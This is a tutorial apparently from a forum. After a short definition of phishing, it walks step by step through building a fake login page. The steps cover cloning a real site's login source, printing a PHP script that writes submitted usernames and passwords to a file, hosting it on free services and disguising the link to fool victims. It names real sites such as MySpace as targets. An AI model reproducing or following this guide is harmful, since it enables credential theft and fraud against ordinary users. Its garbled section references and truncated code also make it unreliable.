Phishing

In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Even when using server authentication, it may require tremendous skill to detect that the website is fake. Phishing is an example of social engineering techniques used to fool users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.

Unlike hacking and cracking, phishing relies on humans to make errors, rather than exploiting code.

Index:
What is a phisher? - 101 Making a T35 Account - 102 Getting Web pages Source Code - 103 Creating Phish File - 104 How to fool people - 105

What is a phisher? 101

A phisher is a fake login page used to gain access to someones account. When someone logs into the fake login page, there password is sent to you.

Making a T35 Account 102 --

In order to make a phisher, you need a web hosting site, I recommend T35. Sign up with a free acount and title it (websiteyourgonnaphish).spam.com For example: myspace.spam.com Most likeley, it is taken so add numbers like 08, or 07.

Getting Web Pages Source Code 103 --

After you create that page, go to the website you will make a phisher for, I will use KHI ( KHInsider Forums ) Make sure you are logged out and and attempt to post a message. You will get an error saying you must log-in. From tehre right-click the page, and click View Source. Copy and paste what has popped-up.

Creating Phish File 104

Once you have that copied, go to your T35 account. Click on "New File" Title it login.htm Then paste your Source Code you copied from 104. Save it.

Now create another file, title it fhish.php And inside, paste this code:

Code: $handle = fopen("thepasses.txt", "a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?> The MySpace | Login is what the page goes to after the victim logs in, change that to what desired

Save the file.

Go back to your login.htm file and click edit. Press CTRL+F and type in action= in the box. Keep pressing find until you find something that says action=(something that has to do with logging in). Replace that with fhish.php. Congratulations, you have a phisher!

How to fool people - 105 - What you do now is disguise your link. Use this code:

Code: T35acount.spam.com/login.htm That is the link to your phishing page. When people login to that, you will get the password in a password.txt file that will be created when someone types something into it. But, you have to trick people. Use this code.

Code: *real website name*.com/login.php Also, if you don't want to use spam.com, use ripway.com and after you uploaded everything, go to Dot TK - Renaming The Internet and choose a free .tk domain name.